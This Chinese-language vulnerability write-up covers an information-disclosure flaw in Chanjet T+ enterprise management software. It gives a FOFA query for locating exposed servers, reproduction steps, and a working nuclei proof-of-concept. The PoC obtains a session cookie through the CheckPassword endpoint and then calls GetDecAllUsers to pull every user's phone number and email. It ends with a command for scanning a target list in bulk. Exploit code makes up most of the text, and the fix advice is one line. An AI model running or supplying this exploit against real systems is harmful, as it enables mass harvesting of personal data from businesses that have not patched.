畅捷通T+ getdecallusers信息泄露漏洞

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

漏洞名称

畅捷通T+ getdecallusers信息泄露漏洞

漏洞影响

畅捷通T+

漏洞描述

畅捷通是用友集团的成员企业，旨在为企业提供全面的财务管理解决方案。作为畅捷通的核心产品，好业财是一款高效、稳定、易用的财务管理工具，它可以帮助企业快速建立财务管理体系，提升财务管理效率。T+是用友畅捷通推出的一款新型互联网企业管理系统，T+能够满足成长型小微企业对其灵活业务流程的管控需求，重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。

该系统存在信息泄露漏洞，导致所有用户账号电话号码以及邮箱泄露。

资产FOFA搜索语句

app="畅捷通-TPlus"

漏洞复现

第一步，通过

/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie

第二步，利用获取到的Cookie请求

/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers接口

nuclei poc

id: yonyou-chanjet-tplus-getdecallusers-infoleak

info:
  name: 畅捷通T+ getdecallusers信息泄露漏洞
  author: fgz
  severity: high
  description: |
    T+是用友畅捷通推出的一款新型互联网企业管理系统，T+能够满足成长型小微企业对其灵活业务流程的管控需求，重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。该系统存在漏洞，导致所有用户账号电话号码以及邮箱泄露
  reference:
    None
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="畅捷通-TPlus"
  tags: chanjet,infoleak

http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Length: 278
        Content-Type: application/json
        
        {"AccountNum": "000", "UserName": "admin", "Password": "", "rdpYear": "2023", "rdpMonth": "5", "rdpDate": "17", "webServiceProcessID": "admin", "ali_csessionid": "", "ali_sig": "", "ali_token": "", "ali_scene": "", "role": "", "aqdKey": "", "fromWhere": "browser", "cardNo": ""}

      - |
        POST /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Length: 54
        Content-Type: application/json

        {"condition": "", "accNum": "", "onlyBuying": "false"}

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains((body_1), 'error')"
          - "status_code_2 == 200 && contains((body_2), 'UserId')"
        condition: and

运行脚本

.\nuclei.exe -t .\yonyou-chanjet-tplus-getdecallusers-infoleak.yaml -l .\1.txt -me result

修复建议

更新到最新版本